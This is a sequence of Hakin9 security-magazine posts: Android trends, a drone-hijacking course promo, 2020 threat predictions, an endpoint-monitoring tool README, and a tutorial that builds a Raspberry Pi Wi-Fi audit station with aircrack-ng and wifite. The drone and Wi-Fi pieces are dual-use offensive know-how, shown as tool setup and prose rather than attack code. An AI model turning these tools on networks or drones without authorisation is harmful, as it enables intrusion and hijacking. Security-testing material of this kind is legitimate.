Recently, Google has launched advanced features for Android developers to help them in developing small applications faster and allow users to use them without installing it. Android App Bundle, a new app publishing format of Google, brings businesses a step forward to develop Google Instant Apps quickly. And, 2020 will witness the success of Android Instant Apps for sure. 

#6. Chatbot

Chatbot is a very popular technology across the business world. It allows companies to provide intelligent responses to customers’ queries, enabling them with the required information, boost sales, and increase revenue. Brands can deliver a better customer experience through instant messaging and close communication quickly through chatbot solutions. 

Integrating chatbot in Android apps, organizations can reduce operational cost by cutting down efforts and resources for customer support service. According to Gartner, twenty-five percent of customer service and support operations will integrate chatbot technology across engagement channels by 2020.

Soon businesses may tie up with an experienced mobile app development company who offers a complete range of Android app development services to build an application with Chatbot.

#7. Blockchain

Blockchain came into the limelight with the rise of cryptocurrency. Recently, it has been observed that a Blockchain Wallet App launched on Google Play Store and reached millions of downloads in a very short time span. It proves that the technology is trending and innovative Android apps with Blockchain will get a good response from customers as well as developers. 

These days, blockchain has gained more popularity over cloud applications due to its adequate security and viability. The technology keeps track of customers digital transactions and ensures the security of clients’ information. 

#8. Kotlin

Kotlin is a highly popular programming language that allows the sharing of code between different platforms. It allows developers to build native apps with native instruments and libraries. Thus, developers prefer Kotlin over Java for Android app development. 

The language runs on a JAW and now it is compilable to a native binary through LLVM based backend. This capability can be used to write code for iOS or even other platforms such as Windows, Mac, etc. Moreover, Kotlin allows programmers to create and share the code for business logic, presenters, repositories, etc. 

#9. In-app Search 

When users open a mobile app, lots of information and offerings are available on different screens of the application. It becomes a challenge for users to find the specific information that they are looking for. In-app search capability of Android apps helps users find exactly what they need. In-app search will stay as a trend for the long term as it is something users expected and demanded. 

#10. Android App Security

In the past, Google was receiving many complaints about breached app security. The apps were accessing users’ personal data without their permission. To address this issue, Google released an Android update with a newly updated security breached app. Now, Android developers are integrating a permission module in the applications to make users’ data more secure. The apps will ask for the user’s permission before accessing his or her personal information. Users have the right to allow or deny any permission. 

Wrapping Up

To rock in 2020 and beyond, businesses have to consider all these Android app development trends to meet the frequently changing digital era. Incorporate emerging technologies in your Android app to deliver fast-paced, unified experiences and address customers expectations. Many more Android app development trends will come and go, but being a business owner, you need to evaluate the right set of technologies that help you seize opportunities and gain a competitive edge.

--------------------------------------------------------------------------------------------------------

About the Author: 

Being a CEO of the Android App Development Company - Credencys, Sandeep helps clients bridge the execution gap with services including: Consulting, Design & Architecture, Product strategy, software development, DevOps, Managed Services. With a motto of ‘Go Digital’, Sandeep delivers an Extraordinary Customer Experience to every client. Connect with Sandeep at sandeep@credencys.com. 

The post Top 10 Trends to Watch for Android App Development in 2020 by Sandeep Agarwal appeared first on Hakin9 - IT Security Magazine.

In this short video from our Drone Wi-Fi hacking blast course you'll see how to use a couple of popular tools, including Crozono and Metasploit, to capture a drone. Hacking a drone's connection to the network will allow you to hijack it. Drone hacking remains a hot topic in the field, so if you're not already on the train, hop on! 

This BLAST course is a self-contained workshop focused on one topic - drone hacking. To complete it you will need about 1 hour to get through the materials we publish, plus whatever time you'll need to perform the exercises. 

Once the drone hijacker grabs the key, an attacker can send malicious packets to restrict the original owner of the drone from sending legitimate control commands. Instead, the drone will accept commands from the attacker. You’ll learn how to hack a drone and connect to it.

Covered topics:

• Connect to an open network
• Connect to a secure network
• Detect and identify
• Gain access
• Active decode
• Intercept and control

Exercises:

• Capture the drone - ONLINE LAB

What will you need?

• Latest VMware Player, VMware Workstation, VMware Fusion or VirtualBox
• Hard disk : Minimum 15GB of free space
• RAM : 4GB Minimum 6GB recommended
• Minimum dual core CPU (Intel prefered,I3 I5 or I7)
• 64 Bits OS with administrator access : Windows, Linux or Mac OS
• 2 free USB port

Who is this course for?

• This course is intended for everyone having an interest in security aspects related to hardware products or embedded devices.
• Electronic enthusiasts and professionals

Instructor’s Bio & Picture:

Carlos Manzo Trujillo is a software and hardware engineer with extensive experience and management skills and works for a hi-tech telecommunication company. The company develops and sells solutions that enable service providers to efficiently deliver high quality voice and data services over broadband access networks while leveraging investment in their network infrastructure. As a senior engineer he is responsible for the development of management software and quality assurance software products produced by the company. Carlos has a CSE from UTEL University of Mexico City.

Check out related content:

Best 20 Hacking Tutorials Preview

Drone Wi-Fi Hacking (W33)

Wireless Hacking

The post Capture a drone and take over [FREE COURSE CONTENT] appeared first on Hakin9 - IT Security Magazine.

As technology continues to rapidly evolve, we can expect that cybercrimes will also increase. Hackers and cybercriminals will always try to find new vulnerabilities and loopholes. This year, we have witnessed some of the most high-end cyber-attacks. These have targeted both governmental organizations and worldwide companies.  

In March 2019, Russian hackers targeted different European agencies ahead of the European Union elections in May. The same month this year, United States officials reported that 27 universities had been a target of Chinese hackers. A month later, a pharmaceutical company known as Bayer announced that it had prevented hackers from stealing its sensitive intellectual property. And they are just the reported attacks. It's clear this type of activity will not be slowing down.

In this article, we are going to look at the top five cybersecurity trends for 2020. 

1. Increase in Mobile Malware 

With mobile usage at an all-time high, this gives cyber criminals a very big audience to target. With thousands of apps being downloaded every day, from mobile banking to online shopping, it's no wonder mobiles are becoming the prime target. A report by CrowdStrike predicts criminals, as well as adversary groups, will increase their attacks on mobile devices in 2020, with sham mobile apps on the increase. According to Kaspersky Lab, there was a worrying rise in mobile malware disguised as legitimate banking apps that were designed to steal money and credentials from users' accounts. The majority of mobile malware is widely distributed from third party sources. Users should therefore be on the lookout for phishing messages that are delivered by email or SMS.  It should go without saying that you should only ever download apps from trusted app stores. 

2. Internet of Things (IoT) attacks 

Statista predicts that there will be over 30 billion connected devices come 2020. The truth of the matter is that Information Technology has been outpaced by the adoption of the Internet of Things. As a result, IoT devices will remain unmanaged leading to a huge visibility gap. As the 5G network continues to roll-out worldwide, cybersecurity will be a problem as data volumes and connected IoT devices rise, thus giving hackers more and more opportunities.  There has been an increase in IoT attacks since the famous Mirai botnet attack back in 2016. We can expect this type of cyber-attack to increase in 2020. Hackers will try to leverage more devices that can be used to deliver attacks such as misinformation and malware. Due to the nature of IoT, there are a lot of devices in several industries that can be targeted. These include medical devices, industrial control systems and even cars. Getting access to these types of systems will allow hackers to pose a significant threat. If an IoT gadget does become compromised, your whole network could be next. Businesses must eliminate Internet of Things blind spots. They need to classify and discover the devices in the whole enterprise environment. 

3. Targeted Ransomware 

The third trend to look out for in 2020 is targeted ransomware. This form of attack is very dangerous and poses a growing threat to many organizations today. In the last 2 years there has been a significant increase in targeted ransomware. If this type of attack is successful, it can be devastating for any business large or small. In 2019, more and more groups have appeared like RobbinHood, GoGalocker, and MegaCortex. GoGalocker, for example, deploys different detection evasion techniques, such as digitally signing ransomware using legit certificates. This reduces the likelihood that they will get flagged for being untrustworthy. You can be sure in 2020 we will see a few high-profile attacks of this kind. 

4. Open source hacking tool adoption 

Businesses are quickly adopting open source software. However, this presents a myriad of risks and security vulnerabilities. Open-source hacking is another cybersecurity threat that is expected to increase in 2020. This type of attack was seen in 2018 and 2019 and is favoured by hackers compared to custom-made malware. We saw new hacking tools being released by attackers in 2019 in dark web marketplaces as well as hacking forums. So, as we enter 2020, you can expect to see cybercriminals launching more complicated attacks. Using better social engineering techniques, better tools, as well as broader targets. To safeguard against this risk, you need to evaluate security controls to ensure even the most basic security measure is followed. The Center for Internet Security offers organizations a prioritized number of tools that should be implemented.

5. Managed Service Providers (MSPs) are targeted by cybercriminals 

In 2019, cybercriminals aimed their attacks at external companies that remotely manage an organisation's IT systems (otherwise known as MSPs). They seized tools that were used to manage customer information, technology systems and vehicles. Managed Service Providers have been centre stage for high profile attacks, which have eroded customer confidence. In recent years, ransomware attacks have aimed their attacks at software that many Managed Services Providers use to manage operations. In 2019, Wipro warned that employee accounts were compromised during a phishing campaign that allowed attackers to use its systems to launch cyberattacks on customers. MSP attacks usually revolve around weak password management and compromised user credentials. To protect yourself against MSP attacks, you need to enforce a strong password policy. You can also enforce a multifactor authentication as a policy in case your systems are at high risk.

In Summary

It is expected that cybersecurity will continue to be a top priority for companies in the coming years. Businesses of all sizes are taking these threats more and more seriously, which of course they should be doing.

Data breaches continue to rise and cybercriminals are using complicated techniques such as Artificial Intelligence to penetrate well-secured systems.

Cybersecurity threats are becoming more dangerous than ever. Businesses need to employ new methods to protect and combat against these cyber threats throughout 2020 and beyond.

About the Author:

Jonathan Krause, Founder & Owner, Forensic Control

Jonathan is a leading cyber security and digital forensic specialist based in London, UK. After working as a computer forensic specialist in the Hi-Tech Crime Unit for the Metropolitan Police at New Scotland Yard, Jonathan founded Forensic Control in 2008. Since then, Jonathan and his team have advised on hundreds of data breaches for corporate clients of all sizes. Jonathan can be reached online at jonathan@forensiccontrol.com and at our company website https://www.forensiccontrol.com/

The post 5 Cyber Security Predictions For 2020 by Jonathan Krause appeared first on Hakin9 - IT Security Magazine.

Attack Monitor is Python application written to enhance security monitoring capabilities of Windows 7/2008 (and all later versions) workstations/servers and to automate dynamic analysis of malware.

Current modes (mutually exclusive):

• Endpoint detection (ED)
• Malware analysis (on dedicated Virtual Machine)

Based on events from:

• Windows event logs
• Sysmon
• Watchdog (Filesystem monitoring Python library)
• TShark (only malware analysis mode)

Current version

0.9.0 (Alpha)

Contact

attack.monitor.github@gmail.com

Demo

Supported OS

• Windows 7, 8, 10 (x86 or x64)
• Windows 2008, 2012, 2016 (x86 or x64)

Pre-requirements

• Powershell 5
• Sysmon (Downloaded, configured and installed by installer.py)
• Python 3.6 (64-bit) - should work on Python 3.x
• Tshark (Malware analysis only)
• Various Python3 libraries (requirements.txt)
• StoneEngine library (included, first time published, high level windows event log interface - Alpha state)

Supported system events

Some of the events are only supported in Malware Analysis Mode

• Filesystem changes
• Permitted network connections
• PowerShell activity (detailed only with PowerShell 5)
• Process creation
• SMB activity
• Scheduled tasks
• Local accounts manipulations
• Success/Failed logins
• Drivers load
• Raw disk access
• Registry monitoring
• Pipe events
• Services
• Audit log cleared
• WMI monitoring of queries + WMI persistence
• DNS requests capture (via Tshark)

Installation - Endpoint Detection Mode

For Malware analysis mode - refer to next section

STEPS:

cmd.exe (Run as admin)
pip3 install -U -r requirements.txt
python installer.py sysmon
  => Choose endpoint detection mode
python installer.py psaudit
python installer.py auditpol
python installer.py install
  => Choose endpoint detection mode
python installer.py exceptions
[Apply section] Installation - How to enable WMI audit?

Installation - Malware analysis Mode

For Endpoint detection mode - refer to previous section:

STEPS:

cmd.exe (Run as admin)
pip3 install -U -r requirements.txt
python installer.py sysmon
  => Choose malware analysis mode
python installer.py psaudit
python installer.py auditpol
python installer.py install
  => Choose malware analysis mode
[Install tshark] https://www.wireshark.org/download.html // To default location
[Apply section] Installation - How to choose network interface for malware listening? // (currently only DNS)
[Apply section] Installation - How to enable WMI audit?
[Apply section] Installation - How to monitor specific directories?

Installation - How to enable WMI audit?

compmgmt.msc
Services and Applications -> WMI Control -> Properties
Security -> Security -> Advanced -> Auditing -> Add

Select principal: Everyone
Type: All
Show advanced permissions:
  Select all (Execute Methods ... Edit Security)

Why it's not in installer.py script? It's hard to do it programmatically.

Installation - How to choose network interface for malware listening?

Edit C:\Program Files\Attack Monitor\config\attack_monitor.cfg

Change in section [feeder_network_tshark]: network_interface=PUT INTERFACE NAME HERE # without quotes

How to determine inteface name?

TShark is using name from Control Panel\Network and Internet\Network Connections (Change adapter settings) e.g. name: WiFi AC => Custom name defined by user e.g. name: Ethernet0

Installation - How to monitor specific directories?

Edit C:\Program Files\Attack Monitor\config\monitored_directories.json

For malware analysis it's recommended to monitor all events (except dir_modified) for directory C:\ with recursive flag enabled. Please add also additional directories if relevant.

How it works?

• Alert is coming from source (Windows Event Log, Sysmon, Filesystem change, TShark)
• Alert is checked against config\exceptions\exception.json which contains all alerts which should be ignored A) For Endpoint Detection - Predefined set of ignored alerts is delivered with software B) For Malware analysis - you need to add exceptions yourself on live system in clean state
• Alert is present in exception.json? Yes) Is discared [Go to step 1] No) Go to next step
• Is learning mode enabled? (Can be enabled in tray icon, or permanently in configuration file) Yes) Alert window popup asking you if you want to ignore this alert, if yes which fields must match to consider event as ignored? (simple comparision, substring, regex)
  • If you decided to add exception for this alert - Alert is added to exceptions [Go to step 1]
  • If you decided to skip exception window - Go to next step

  Now go to the next step:

• Alert user about capture event. Outputs:
  • System tray baloon notification (Only when you are moving mouse and computer isn't locked)
  • Alert is saved to logs\.txt

Known bugs

• Exit isn't gracefull
• Tray icon appears and disappears

Download tool and support author: https://github.com/yarox24/attack_monitor

The post Attack Monitor - Endpoint Detection And Malware Analysis Software appeared first on Hakin9 - IT Security Magazine.

Station to perform WiFi network audits, using Raspberry Pi Zero W and Raspberry Pi 3, with connection from the BT or Mobile Data cell phone.

Always use technology for improve the world, if you are a black hat or gray hat hacker please abstain at this point or at least leave your star to make me feel less guilty XP.

Introduction

In today's world, computer security is one of the main concerns of people and companies, but we are certainly exposed to attacks by black hat hackers, who only seek to do evil and use their skills to do wrong to companies, people or even you.

So it occurred to me that it would be incredible to be able to perform security tests of wireless networks through a simple system such as a raspberry, however one of the great disadvantages of these is the need to use display systems such as HDMI screens and keyboards to insert the commands.

In this case the project explains how to make a system based on a Raspberry Pi Zero W with a Bluetooth Serial or WiFi SSH to a Smartphone, so that it is possible to write the commands on the console using the Smartphone.

Materials

Hardware:

• Raspberry Pi Zero W.
• Sd Card (min 8 Gb).
• Bluetooth module HC-06 (or similar).
• OTG adapter.
• PCB Breadboard.
• Female Header.
• USB cable to MicroUSB.
• Arduino or TTL serial interface
• Smartphone.
  • Android supports Bt serial and WiFi ssh.
  • iPhone supports only WiFi ssh.
• Powerbank 5v. (min 2000 MAh to ensure the card can turn on at least 2 hours).
• Any external network card, I use an AirLink101 (AWLL3028).

(check if it is compatible with the Arimon-ng library of Aircrack-ng)

https://www.aircrack-ng.org/doku.php?id=en:compatible_cards

Note: Check compatibility of your network card so that it is able to enter monitor mode, if it is not possible you can not continue with the tutorial.

Software:

• Bluetooth Terminal (Android)
• Mobile SSH (Android)
• WebSSH (iPhone)
• Putty - https://www.putty.org/
• Etcher - https://etcher.io/
• Sd card formatter - https://www.sdcard.org/downloads/formatter_4/
• Advanced IP Scanner - https://www.advanced-ip-scanner.com/es/
  • for linux and mac Angry IP Scanner https://angryip.org/

Bt Module

The first thing to do would be the module for bluetooth communication with the raspberry, for this we must first configure the name and baud rate of the bluetooth module to 115200 baud, since the raspberry uses this transmission speed.

• We connect the serial ttl to the module Rx to Tx(Green), Tx to Rx(White), Vcc to Vcc(Red) and GND to GND (Black).

• Once connected we open the serial monitor that we have installed for example Putty (https://www.putty.org/).

• Once we connect to the interface at 9600 baud (Default Baud Rate), we have to send the following commands to the bluetooth, all commands are sent in uppercase and without NL or CR.
  • AT (to confirm that the module is receiving the commands.)
    • Answer: OK
  • AT+NAMEdevicename (to confirm that the module is receiving the commands.)
    • Answer: OKsetname
  • AT+PINyourpin
    • Answer: OKSetpin
  • AT+BAUD8 (115200 Baud Rate)
    • Answer: OK115200

Since we finished these configuration, we will do this through the UART port that has the raspberry, as shown in the following diagram.

I recommend that you make the circuit on a breadboard PCB, as shown in the following 2 images, this in order that the module can be transported without cables being disconnected by movement.

Raspberry Setup

For the configuration of this tutorial we will use the Raspberry Pi Zero W, due to its small size, low power consumption and ease of use, however it is possible to use a raspberry pi 3, but you will have to use a much more powerful power bank, besides that the size is much bigger.

• Download "RASPBIAN STRETCH LITE" from https://www.raspberrypi.org/downloads/raspbian/.
  • You can install if you want the desktop version but it is best to use the lite version to improve the performance of the raspberry pi zero w.
• Flash Raspbian on the sd card as indicated on the official page. https://www.raspberrypi.org/documentation/installation/installing-images/README.md
• Once the operating system is in the SD card, 2 disc partitions will be created in the SD card, we enter the one called "boot".
  • Open the file called config.txt
  • At the end of the file put the following text "enable_uart = 1" and save.
• Download the two files in the "files" folder and copy them to the "boot" partition, .
• Since both files are in "boot", open the file "wpa_supplicant.conf" and replace the ssid and psk (password), with your network name and password without removing the quotes.(Below I show the example.)

 country=us 
  update_config=1 
  ctrl_interface=/var/run/wpa_supplicant  

  network= 
  {  
   scan_ssid=1 
   ssid="networkname"
   psk="password" 
  }

• We do this to activate serial communication for the bluetooth module and communication via SSH (iPhone compatibility). However, it must be clarified that if the station is used through SSH, we must configure the wpa_supplicant.conf configuration with the shared network of the smartphone.

Note: I recommend that you first do the configuration with your home network because you have to download files.

Software Setup

• Connect the SD card in the raspberry and the connection to the power.
• Wait 3 minutes for the operating system to finish configuring.
• Open the Advanced IP Scanner or Angry IP Scanner program and perform a full search, you can identify the Raspberry because it appears as shown at the bottom.

• Once the IP is found, we open "Putty" program and put the ip in the box that says "Host Name" and press "Open" in the box below.
• When the word "login" appears, you need write "pi" and press the enter key, for password you have to put "raspberry" and press enter.
• Since we are in the linux command console, we need to put the following commands (This process may take a long time depending on the internet connection).
  • sudo apt-get -y install libssl-dev libnl-3-dev libnl-genl-3-dev ethtool
  • sudo apt-get install aircrack-ng
  • sudo apt-get install wifite
• Once we have finished this, we can start to make tests with the raspberry.

Note: DONT DO "sudo apt-get update" or "sudo apt-get upgrade" as this may corrupt the operating system and ruin the entire previous process.

Make Portable

• Connect all the hardware:
  • Raspberry
  • Network card
  • Bluetooth Module.
• And after that connects the raspberry to the power bank.
• Once this is done it configures the connection to the bluetooth module from the bluetooth configuration of each cell phone (only valid in Android).
• Once the configuration is done, open the Bluetooth Terminal app and elect the points in the upper right corner, press the "Setup" option, select the option "Append newline(\r\n)", press "save".
• Select the points in the upper right corner, press the option "Connect a device - Secure" and select the device.
• Note: the module may require several attempts to connect, keep trying if it does not connect.
• Since I connect, we will type "pi" and then press "Send".
• Then we write "raspberry" and press "Send".
• You will notice that the linux command console appears.

SSH Setup (Optional)

• At this point we have activated the ssh on the raspberry, now we will use that configuration to make a connection from the mobile data of the cell phone.
• First we will have to configure the "wpa_supplicant.conf" of the raspberry for the ssid and the key that we have in our "personal hotspot".
• There are several ways to find the IP of the raspberry at this point this only has to be done once.
  • Option 1: Since the "wpa_supplicant.conf" file is modified, we will connect from the pc to our hotspot and analyze the cellular network in such a way that we find the IP of the raspberry.
  • Option 2: We connect the BT terminal from an Android device and type "hostname -I" to find the IP.
  • Option 3: We connect the Raspberry to a screen, once it opens the terminal, we type "hostname -I" and it gives us the IP.
  • Option 4: We connect the USB TTL that we use to configure the bluetooth to the raspberry, we initiate session typing "pi", "raspberry" and once in the terminal of linux put "hostname -I" to obtain the IP.
• Since we have the IP, we enter MobileSSH or WebSSH as the case may be and we initiate session in the linux terminal.

An example of the device running with the iPhone's mobile hotspot and running Wifite on an SSH console.

References:

• https://kamilslab.com/2017/04/08/how-to-install-wifite-on-the-raspberry-pi/
• https://www.raspberrypi.org
• https://www.kali.org/
• https://www.instructables.com/id/AT-command-mode-of-HC-05-Bluetooth-module/

Github page and further information: https://github.com/altaga/Portable-Hacking-Station-RPI

The post Portable station to perform WiFi network audits, using Raspberry Pi Zero W and Raspberry Pi 3 appeared first on Hakin9 - IT Security Magazine.